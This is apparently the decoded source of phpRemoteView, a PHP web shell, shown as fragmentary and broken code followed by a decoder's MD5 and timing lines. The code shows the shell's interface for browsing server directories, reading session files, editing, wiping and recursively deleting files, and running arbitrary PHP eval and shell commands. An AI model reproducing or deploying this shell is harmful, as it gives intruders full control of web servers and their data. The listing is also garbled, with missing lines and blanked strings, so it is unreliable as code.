            //elseif (isset($HTTP_COOKIE_VARS[$v])) $$v=$HTTP_COOKIE_VARS[$v];

   // autofix 'magic quotes':
   $autovars2="php shell text d root convert";
   if (get_magic_quotes_runtime() || get_magic_quotes_gpc()) {
      foreach (explode(" ",$autovars2) as $k=>$v) {
         if (isset($$v)) $$v=stripslashes($$v);

      "d/m/y H:i",

   if (isset($HTTP_COOKIE_VARS["cp$panel"]))


$cc / $cp[0]-   ,   $cs:
   $cc[0] -    ,     :
               n -  
               e - 
   $cc[1] -  (0 - . 1 - )
   $cc[2] -   
   $cc[3] -       :
               0 -   text/plain
               1 -   html
               2 - download
               3 -   (info)
   $cc[4] -     //
   $cc[5] - :
               1 - 
               2 - 

$cn / $cp[1] -     ,  ,  /:
   t - type
   n - name
   s - size
   a - owner+group
   o - owner
   g - group
   c - chmod
   1 - create time
   2 - modify time
   3 - access time







"Index of"=>"",
"View file"=>" ",
"Sorry, this programm run in read-only mode."=>",      ' '.",
"For full access: write"=>"  : ",
"in this php-file"=>"  php-",
"Error path"=>" ",
"Click here for start"=>"  ",
"up directory"=>" ",
"access denied"=>" ",
"Free download"=>" ",
"back to directory"=>"  ",
"FileType"=>" ",
"Create time"=>" ",
"Access time"=>" ",
"MODIFY time"=>" ",
"HEXDUMP PREVIEW"=>"  16- ",
"Can't READ file - access denied"=>"   -  ",
"full read/write access"=>"   /",
"Delete this file"=>" ",
"Set current 'mtime'"=>"..",
"Write '0000..' and delete"=>" , ",
"COPY FILE"=>" ",
"MAKE DIR"=>" ",
"type full path"=>"  ",
"CREATE NEW FILE or override old file"=>"     ",
"select file on your local computer"=>"     ",
"save this file on path"=>"    ",
"create file name automatic"=>"   ",
"type any file name"=>"   ",
"convert file name to lovercase"=>"    ",
"Send File"=>" ",
"Delete all files in dir"=>"  ",
"Delete all dir/files recursive"=>"  + ",
"Confirm not found (go back and set checkbox)"=>"   (    )",
"Delete cancel - File not found"=>"  -   ",
"NO (back)"=>" ()",
"Delete cancel"=>" ",
"done (go back)"=>" ()",
"Delete ok"=>", ",
"Touch cancel"=>" ",
"Touch ok (set current time to 'modify time')"=>"  (    )",
"Clean (empty file) cancel"=>" ( ) ",
"Clean ok (file now empty)"=>",  ( )",
"Wipe cancel - access denied"=>"  -  ",
"Wipe ok (file deleted)"=>",  (  )",
"Deleting all files in"=>"   ",
"Deleting all dir/files (recursive) in"=>"  / ()",
"DONE, go back"=>", ",
"file not found"=>"  ",
"ONLY READ ACCESS (don't edit!)"=>"    ( )",
"Can't READ file - access denied (don't edit!)"=>"    -  ",
"EDIT FILE"=>" ",
"can't open, access denied"=>"  ,  ",
"SAVE FILE (write to disk)"=>"  (  )",
"You mast checked 'create file name automatic' OR typed file name!"=>"    [  ]      !'",
"SAVING TO"=>" ",
"Sorry, access denied"=>",  ",
"for example, uncomment next line"=>" ,   ",
"Eval PHP code"=>" PHP ",
"don't type"=>" ",
"example (remove comments '#')"=>" (  '#')",
"Shell commands"=>" Shell'a",
"filesize to 0byte"=>"  0 ",
"Full file name"=>"  ",
"Can't open directory"=>"   ",
"Reset all settings"=>"  ",
"Colums and sort"=>"  ",
"Sort order"=>" ",
"Ascending sort"=>" ",
"Descending sort"=>" ",
"Sort by filename"=>"   ",
"Sort by filename extension"=>"   ",
"Date/time format"=>" /",
"Panel font & size"=>"/ ",
"Char map"=>"",
"Character map (symbol codes table)"=>" ",
"Select font"=>" ",
"or type other"=>"  ",
"Font size"=>" ",
"Code limit"=>" ",
"Generate table"=>" ",
"Universal convert"=>" "

   if ($language!=1 && $language!=2) $language=1;

function mm($m) {
   global $mm,$language;
   if ($language==1) return $m;
   if (isset($mm[$m])) return $mm[$m];
   else echo "<script>alert('(mm) msg not found: $m');</script>";

switch ($language) {
case 1:
case 2:



   if (!isset($c)) $c="";
   if (!isset($d)) $d="";
   if (!isset($f)) $f="";

   if ($d=="") $d=realpath("./")."/";
   if ($c=="") $c="l";
   if ($d[strlen($d)-1]!="/") $d.="/";
   if (!is_dir($d)) obb().die("<h3><P>".mm("Can't open directory")." <tt><font color=red><big>$d</big></font></tt>$obb");
   if (!realpath($d) || filetype($d)!="dir") obb().die("error dir type $obb");

   // OS detect:
   if (strlen($d)>1 && $d[1]==":") $win=1; else $unix=1;


<title>phpRemoteView: $d$f</title>
A {
text-decoration : none;
.t {
font-size: 9pt;
text-align : center;
font-family: Verdana;
.t2 {
font-size: 8pt;
text-align : center;
font-family: Verdana;
.n {
  font-family: Fixedsys
.s {
font-size: 10pt;
text-align : right;
font-family: Verdana;
.sy {
font-family: Fixedsys;
.s2 {
font-family: Fixedsys;
color: red;
.tab {
font-size: 10pt;
text-align : center;
font-family: Verdana;
background: #cccccc;
.tr {
background: #ffffff;

function display_perms($mode)
if ($GLOBALS['win']) return 0;
/* Determine Type */
if( $mode & 0x1000 )
$type='p'; /* FIFO pipe */
else if( $mode & 0x2000 )
$type='c'; /* Character special */
else if( $mode & 0x4000 )
$type='d'; /* Directory */
else if( $mode & 0x6000 )
$type='b'; /* Block special */
else if( $mode & 0x8000 )
$type='-'; /* Regular */
else if( $mode & 0xA000 )
$type='l'; /* Symbolic Link */
else if( $mode & 0xC000 )
$type='s'; /* Socket */
$type='u'; /* UNKNOWN */

/* Determine permissions */
$owner["read"] = ($mode & 00400) ? 'r' : '-';
$owner["write"] = ($mode & 00200) ? 'w' : '-';
$owner["execute"] = ($mode & 00100) ? 'x' : '-';
$group["read"] = ($mode & 00040) ? 'r' : '-';
$group["write"] = ($mode & 00020) ? 'w' : '-';
$group["execute"] = ($mode & 00010) ? 'x' : '-';
$world["read"] = ($mode & 00004) ? 'r' : '-';
$world["write"] = ($mode & 00002) ? 'w' : '-';
$world["execute"] = ($mode & 00001) ? 'x' : '-';

/* Adjust for SUID, SGID and sticky bit */
if( $mode & 0x800 )
$owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
if( $mode & 0x400 )
$group["execute"] = ($group['execute']=='x') ? 's' : 'S';
if( $mode & 0x200 )
$world["execute"] = ($world['execute']=='x') ? 't' : 'T';

$s=sprintf("%1s", $type);
$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
return trim($s);

function _posix_getpwuid($x) {
   if ($GLOBALS['win']) return array();
   return @posix_getpwuid($x);

function _posix_getgrgid($x) {
   if ($GLOBALS['win']) return array();
   return @posix_getgrgid($x);

function up($d,$f="",$name="") {
   global $self,$win;

   if ($len<70) { $sf1="<font size=4>"; $sf2="<font size=5>"; }
   elseif ($len<90) {$sf1="<font size=3>"; $sf2="<font size=4>";}
   else {$sf1="<font size=2>"; $sf2="<font size=3>";}

   echo "<table width=100% border=0 cellspacing=0 cellpadding=4><tr><td
   bgcolor=#cccccc> $sf1";

   $home="<a href='$self'><font face=fixedsys size=+2>*</font></a>";
   echo $home.$sf2."<b>";
   if ($name!="") echo $name;
   else {
      if ($f=="") echo mm("Index of");
      else echo mm("View file");
   echo "</b></font> ";


   if ($win) $rootdir=strtoupper(substr($d,0,2))."/";

   for ($i=0; $i<count($path)-1; $i++) {
      if ($i==0)

      echo "<a href='$self?c=l&d=".urlencode($ss)."'>$comm</a>";
      if ($i==0 && $d=="/") break;
   echo "</font>";
   if ($f!="") echo "$sf1$f</font>";

   if ($win && strlen($d)<4 && $f=="") {
      echo " &nbsp; ".mm("DISK").": ";
      for ($i=ord('a'); $i<=ord('z'); $i++) {
         echo "<a href=$self?c=l&d=".chr($i).":/>".strtoupper(chr($i)).":</a> ";

   echo "</b></big></td><td bgcolor=#999999 width=1% align=center>
   <table width=100% border=0 cellspacing=3 cellpadding=0
   bgcolor=#ffffcc><tr><td align=center><font size=-1><nobr><b><a
   href=$self?c=t&d=".urlencode($d).">".mm("REMVIEW TOOLS")."</a></b>

function up_link($d,$f) {
   global $self;
echo "<small>
[<a href=$self?c=i&d=".urlencode($d)."&f=".urlencode($f)."><b>".mm("Info")."</b></a>]
[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=><b>".mm("Plain")."<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=0&fnot=1>(+)</a></b></a>]
[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=1><b>".mm("HTML")."<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=1&fnot=1>(+)</a></b></a>]
[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=4><b>".mm("Session")."</b></a>]
[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=2&fnot=1><b>".mm("Image")."</b></a>]
[<a href=$self/".urlencode($notepad)."?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=3&fnot=1&fatt=".urlencode($notepad)."><b>".mm("Notepad")."</b></a>]
[<a href=$self/".urlencode($f)."?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=3&fnot=1><b>".mm("DOWNLOAD")."</b></a>]
[<a href=$self?c=e&d=".urlencode($d)."&f=".urlencode($f)."><b>".mm("Edit")."</b></a>]

function exitw() {
exit("<table width=100% border=0 cellspacing=2 cellpadding=0 bgcolor=#ffdddd>
<tr><td align=center>
".mm("Sorry, this programm run in read-only mode.")."<br>
".mm("For full access: write")." `<tt><nobr><b>\$write_access=<u>true</u>;</b></nobr></tt>`
".mm("in this php-file").".</td></tr></table>

function ob() {
   global $obb_flag, $obb;
   if (!isset($obb_flag)) { $obb_flag=0; $obb=false; }
   if (function_exists("ob_start")) {
      if ($GLOBALS['obb_flag']) ob_end_clean();

function obb() {
   global $obb;
   if (function_exists("ob_start")) {
<table bgcolor=#ff0000 width=100% border=0 cellspacing=1 cellpadding=0><tr><td>
<table bgcolor=#ccccff width=100% border=0 cellspacing=0 cellpadding=3><tr><td align=center>
<table bgcolor=#ffcccc width=100% border=0 cellspacing=0 cellpadding=3><tr><td>

function sizeparse($size) {
   return strrev(preg_replace("!...!","\\0 ",strrev($size)));

function jsval($msg) {
   return '"'.$msg.'",';


switch($c) {

// listing
case "l":

   echo $GLOBALS['html'];

   if (!realpath($d)) die("".mm("Error path").". <a href=$self>".mm("Click here for start")."</a>.");




   if (!$di) exit("<a href=$self?&c=l&d=".urlencode(realpath($d."..")).
      "><nobr>&lt;&lt;&lt; <b>".mm("up directory")."</b> &gt;&gt;&gt;</nobr></a> <p>".
      "<font color=red><b>".mm("access denied")."</b></font>: $obb");
   while (false!==($name=$di->read())) {
      if ($name=="." || $name=="..") continue;
      if (@is_dir($d.$name)) {
      else {
      if (!is_int($fsize[$name])) { $ftype[$name]='?'; $fstatus[$name]=1; }
      if (preg_match("!^[^.].*\.([^.]+)$!",$name,$ok))

   if (count($dirs))
   foreach ($dirs as $v) {
       switch ($cc[0]) {
          case "e": $listsort[$v]=$fext[$v].' '.$v; break;
          case "n": $listsort[$v]=strtolower($v); break;
             switch ($cn[$cc[0]]) {
                case "t": case "s": case "n": $listsort[$v]=strtolower($v); break;
                case "o": $listsort[$v]=$fowner[$v]; break;
                case "g": $listsort[$v]=$fgroup[$v]; break;
                case "a": $listsort[$v]="$fowner[$v] $fgroup[$v]"; break;
                case "c": $listsort[$v]=$fperms[$v]; break;
                case "1": $listsort[$v]=$fctime[$v]; break;
                case "2": $listsort[$v]=$fmtime[$v]; break;
                case "3": $listsort[$v]=$fatime[$v]; break;


   //echo "<pre>";print_r($names);
   if ($cc[1]) arsort($names); else asort($names);
   //echo "<pre>";print_r($names);

   if (count($files))
   foreach ($files as $v) {
       switch ($cc[0]) {
          case "e": $listsort[$v]=$fext[$v].' '.$v; break;
          case "n": $listsort[$v]=strtolower($v); break;
             switch ($cn[$cc[0]]) {
                case "n": $listsort[$v]=strtolower($v); break;
                case "t": $listsort[$v]=$ftype[$v]; break;
                case "s": $listsort[$v]=$fsize[$v]; break;
                case "o": $listsort[$v]=$fowner[$v]; break;
                case "g": $listsort[$v]=$fgroup[$v]; break;
                case "a": $listsort[$v]="$fowner[$v] $fgroup[$v]"; break;
                case "c": $listsort[$v]=$fperms[$v]; break;
                case "1": $listsort[$v]=$fctime[$v]; break;
                case "2": $listsort[$v]=$fmtime[$v]; break;
                case "3": $listsort[$v]=$fatime[$v]; break;


   //echo "<pre>DIRS:"; print_r($names);
   if ($cc[1]) arsort($listsort); else asort($listsort);
   foreach ($listsort as $k=>$v) $names[$k]=$v;
   //echo "<pre>FILES:"; print_r($listsort);
   //echo "<pre>NAMES:"; print_r($names);

.title {
color: 'black';
background: #D4D0C8;
text-align: 'center';
BORDER-RIGHT:   #888888 1px outset;
BORDER-TOP:     #ffffff 2px outset;
BORDER-LEFT:    #ffffff 1px outset;
BORDER-BOTTOM:  #888888 1px outset;
.window {
BORDER-RIGHT:  buttonhighlight 2px outset;
BORDER-TOP:    buttonhighlight 2px outset;
BORDER-LEFT:   buttonhighlight 2px outset;
BORDER-BOTTOM: buttonhighlight 2px outset;
FONT: 8pt Tahoma, Verdana, Geneva, Arial, Helvetica, sans-serif;
CURSOR: default;
.window1 {
BORDER-RIGHT:  #eeeeee 1px solid;
BORDER-TOP:    #808080 1px solid;
BORDER-LEFT:   #808080 1px solid;
BORDER-BOTTOM: #eeeeee 1px solid;
FONT: 8pt Tahoma, Verdana, Geneva, Arial, Helvetica, sans-serif;
.line {
BORDER-RIGHT:   #cccccc 1px solid;
BORDER-TOP:     #ffffff 1px solid;
BORDER-LEFT:    #ffffff 1px solid;
BORDER-BOTTOM:  #cccccc 1px solid;
font: <?php echo $cp[4]; ?>pt <?php echo $cp[3]; ?>;
.line2 {
background: #ffffcc;
.black {color: black} {color: black} {color: black} {color: black} {color: #0000ff}

.white {color: white}
a:link.white{color: white}
a:active.white{color: white}
a:visited.white{color: white}
a:hover.white{color: #ffff77}

a:link     {color: #000099;}
a:active   {color: #000099;}
a:visited  {color: #990099;}
a:hover    {color: #ff0000;}
a {
CURSOR: default;
.windowtitle {
font: 9pt; Tahoma, Verdana, Geneva, Arial, Helvetica, sans-serif;
font-weight: bold;
color: white;
.sym {
font: 14px Wingdings;


function up2($d) {
   global $win,$self;
   if (substr($d,-1)!="/") $d.="/";


   for ($i=0; $i<count($n); $i++) {
      if ($i==0) $path=strtoupper($path);

   for ($i=0; $i<count($n); $i++) {
      $out.="<a href=$self?c=l&d=".urlencode($paths[$i])." class=white>";
      if (strlen($d)>$gr && $i>0 && $i+1<count($n)) {
         if (strlen($d)-$sum>$gr) {
         if ($i==0) $out.=strtoupper($n[$i]); else $out.=$n[$i];


   return $out;
   return "<font size=-2>$d</font>";


   echo "\n\n\n<script>\nfunction tr(";
   for ($i=0; $i<strlen($cn); $i++) {
      echo "a$i,";
   echo "x) {\ndocument.write(\"<tr bgcolor=#eeeeee";
//   echo " onMouseOver='\\\"line2\\\"' onMouseOut='\\\"line\\\"'>";
   echo " onMouseOver='\\\"#FFFFCC\\\"' onMouseOut='\\\"\\\"'>";
   for ($i=0; $i<strlen($cn); $i++) {
      echo '<td align='.$cn_align[$cn[$i]].' class=line ';
      switch ($cn[$i])  {
         case 's': case 'c':  case '1':  case '2':  case '3': case 't':
            echo ' nowrap';
      echo ">";
      if ($cn[$i]!='t' && $cn[$i]!='n') echo "\xA0";
      echo "\"+a$i+\"";
      if ($cn[$i]!='t' && $cn[$i]!='n') echo "\xA0";
      echo "</td>";
   echo "</tr>\");\n}";
   echo "\n\n</script>\n\n\n";

   //echo implode(" | ",$cp);
   echo '<table border=0 cellspacing=2 cellpadding=0 bgcolor=#cccccc
      class=window align=center width=60%><form name=main>';

   echo '<tr><td colspan='.strlen($cn).' bgcolor=#0A246A background="'.
   $self.'?c=img&name=fon&r=" class=windowtitle>';

         echo '<table width=100% border=0 cellspacing=0 cellpadding=2 class=windowtitle><tr><td>'.
         '<a href='.$self.'><img src='.$self.'?c=img&name=dir border=0></a>'.

   echo '</td></tr>'.
   '<table width=100% border=0 cellspacing=0 cellpadding=0 class=window1><tr>';

   'up'=>"UP DIR",
   'mode'=>'SETUP, folder option',
   'edit'=>'DIR INFO',
   'setup'=>'PHP eval, Shell',

   function button_url($name) {
      global $self,$d,$f,$uurl;
      switch ($name) {
         case 'up': return "$self?c=l&d=".urlencode(realpath($d.".."));
         case 'refresh': return "$self?c=l&r=".rand(0,10000)."&d=".urlencode($d);
         case 'mode': return "$self?c=setup&ref=$uurl";
         case 'edit': return "$self?c=d&d=".urlencode($d);
         case 'home': return "";
         case 'papki': return "$self?c=tree&d=".urlencode($d);
         case 'setup': return "$self?c=t";
         case 'back': return "javascript:history.back(-1)";
   echo '<td colspan='.strlen($cn).'>
   <table border=0 cellspacing=0 cellpadding=2><tr>';
   for ($i=0; $i<count($buttons); $i++) {
      if ($buttons[$i]=='full') {
         echo '<td class=window width=90% align=center nowrap><font color=#999999 face="Arial Black"
         style="font-size: 11pt;">&lt;?php<u>R</u>emote<u>V</u>iew?&gt;</font></td>';
      if ($buttons[$i]=='disk') {
         if (!$win) continue;
         echo '<td width=1% title=\'Select dist\' class=window onMouseOver="\'#eeee88\'" '.
              ' onMouseOut="\'\'">';
         echo "<select name=disk size=1; style='font: 9pt Arial Black; color: #999999 '
         for ($j=ord('A'); $j<=ord('Z'); $j++)
            echo '<option value="'.chr($j).'"'.(chr($j)==$tmp?" selected":"").'>'.chr($j);
         echo "</select></td>";
      echo '<td width=1% title=\''.$button_help[$buttons[$i]].'\' class=window'.
           ' onMouseMove="\'#eeee88\';window.status=\'** '.$button_help[$buttons[$i]].' ** '.$bturl.'\'"'.
           ' onMouseOut="\'\';window.status=\'\'"'.
           ' onClick=\'location.href="'.$bturl.'"\'><a href=';
      echo button_url($buttons[$i]);
      echo '><img HSPACE=3 border=0 src='.$self.'?c=img&name='.$buttons[$i].'></a></td>';
   echo '</tr></table>

   for ($i=0; $i<strlen($cn); $i++) {
      echo "<td nowrap class=title onClick='location.href=\"".
      switch ($cn[$i]) {
         case 1: case 2: case 3: case "s": echo " width=13%"; break;
         case 't': echo " width=2%"; break;
         case 'n': echo " width=40%"; break;
      echo "><a href='$self?c=set&c2=sort&name=$i&pan=$panel&ref=$uurl' class=black>";
      switch ($cn[$i]) {
         case "n": case "t": case "s": case "o": case "g":
         case "a": case "c": case "1": case "2": case "3":
            echo "\xA0".$cn_name[$cn[$i]]."\xA0"; break;
            echo "??$cn[$i]??";
      if ($cc[0]==="$i") {
         if ($cc[1]=='0') echo "<img src=$self?c=img&name=sort_asc border=0>";
         else echo "<img src=$self?c=img&name=sort_desc border=0>";
      echo '</a></td>';
   echo '</tr>';

   echo "\n\n<script>\n\n";
   foreach ($names as $k=>$v) {

      echo "\n\n// $k \n";
      echo 'tr(';

      for ($i=0; $i<strlen($cn); $i++) {

         switch ($cn[$i]) {

            case 'n':
               switch($ftype[$k]) {
               case 'file':
                  if ($vv==".gif" || $vv==".jpg" || $vv==".png" || $vv==".bmp"
                     || $vv==".ico" || $vv=="jpeg") $add="&ftype=2&fnot=1";
                  if (substr($k,0,5)=="sess_") $add="&ftype=4";
                  $ln='<a href='.$self.'?&c=v&d='.urlencode($d).

                  $ln='<a href='.$self.'?&c=l&d='.urlencode($d.$k).'>';

               if ($ftype[$k]=='dir')
                  $ln.='<img src='.$self.'?c=img&name=dir border=0>';
               else {
                  foreach ($ext as $kk=>$vv) {
                     if (in_array(strtolower($fext[$k]),$vv)) {
                        $ln.='<img src='.$self.'?c=img&name='.$kk.' border=0>';
                  if (!$found)
                     $ln.='<img src='.$self.'?c=img&name=unk border=0>';
               echo jsval($ln);


            case "t":
               switch ($ftype[$k]) {
               case "dir":
                  echo jsval("<a href=$self?c=d&d=".urlencode($d.$k).">DIR</a>");
               case "file":
                  echo jsval("<a href=$self/".urlencode($k)."?&c=v&fnot=1&ftype=3&d=".
                     urlencode($d)."&f=".urlencode($k)." class=sym>\xF2</a> ".
                     "<a href=$self?&c=i&d=".urlencode($d)."&f=".urlencode($k)." class=sym>\xF0</a>");
               case "link":
                  echo jsval("<font class=t>&#8212;&gt;</font>");

Function Calls





MD5 0753a936469a4d203594b620e5548e57
Eval Count 0
Decode Time 157 ms